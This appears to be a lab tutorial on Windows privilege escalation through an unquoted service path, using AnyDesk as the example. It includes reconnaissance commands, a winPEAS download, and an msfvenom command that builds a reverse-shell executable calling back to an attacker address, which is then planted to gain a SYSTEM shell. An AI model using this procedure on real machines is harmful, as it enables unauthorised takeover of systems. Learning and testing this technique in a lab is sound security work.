Windows Privilege Escalation — Unquoted Service Path
Introduction
There are many service which have spaces in them and that is unquoted.
First we have to find out how many services are running in our system , that we can process in runtime.
$tasklist /svc
Let’s take “AnyDesk” as an example, query the service .
$sc qc AnyDesk
- As we can observe in the above POC that BINARY_PATH_NAME is missing double quote so this is an unquoted service path.
- Means , BINARY_PATH_NAME does not have double quotes in starting and end.
But for fully exploiting “Unquoted Service Path” we need one more drawback i.e., “White space between the folder name”.
Let’s assume “C:\” folder becomes word writable , and I created one File i.e., “Program.exe”.
Then when the service starts again , and it will run as command , and “C:\Program.exe” will be called because we have space after Program. This is a kernel object vulnerability it tells it will run after spaces.
This is built-in kernel object flaw in Windows Operating System.
Firstly it will try to execute “C:\Program.exe” and after this it will try “ C:\Program Files.exe” as shown in above POC.
This happens because the path is unquoted. This is the whole flaw of unquoted service.
Let’s understand one case , if the path has white spaces and it unquoted , doesn’t mean you can exploit it directly , for exploiting you need write access.
What if the “Program Files(x86)” folder is not writable , but “AnyDesk MSI” folder is writable , so we can create a executable “AnyDesk.exe” , the more the white space greater the chances of exploitation.
Lab Setup
Before exploiting the service, we will create the vulnerable machine ourselves and perform the exploit.
Copy any one Lab Setup and Initial shell steps from previous blogs:
Here you can either make your executable path vulnerable to Service binary path write-based privesc or Service directory write based privesc.
Our goal is to give write permission to the executable path.
Then after all the lab setup steps , follow this step to make you executable path Unquoted.
Let’s perform the window privilege escalation attack
Successfully got the initial shell
Now the question comes , when you have the initial shell what will you do in windows operating system.
The first thing is to upload winpeas without thinking twice.
https://github.com/carlospolop/PEASS-ng/releases/download/20230910-ae32193f/winPEASx64.exe
Start a python server , and download winpeas in window’s system.
Now run the winpeas i.e., downloaded in the system.
Look for “Unquoted and Space detected”.
Query the service “AnyDesk”
Observe in the above POC that BINARY_PATH_NAME is missing double quote and have white spaces so this is unquoted service path.
START_TYPE is AUTO_START i.e., The service starts at system startup.
So, let’s generate a payload from “msfvenom” in our local machine.
$msfvenom -p windows/x64/shell_reverse_tcp lhost=192.168.29.219 lport=4545 -f exe > AnyDesk.exe
Transfer the generate payload to target machine.
Payload is successfully downloaded in target machine.
Now stop the service
Lets start the service, before starting the service start the netcat listener.
Successfully got the shell by starting the service again as
“NT Authority\System”!!!
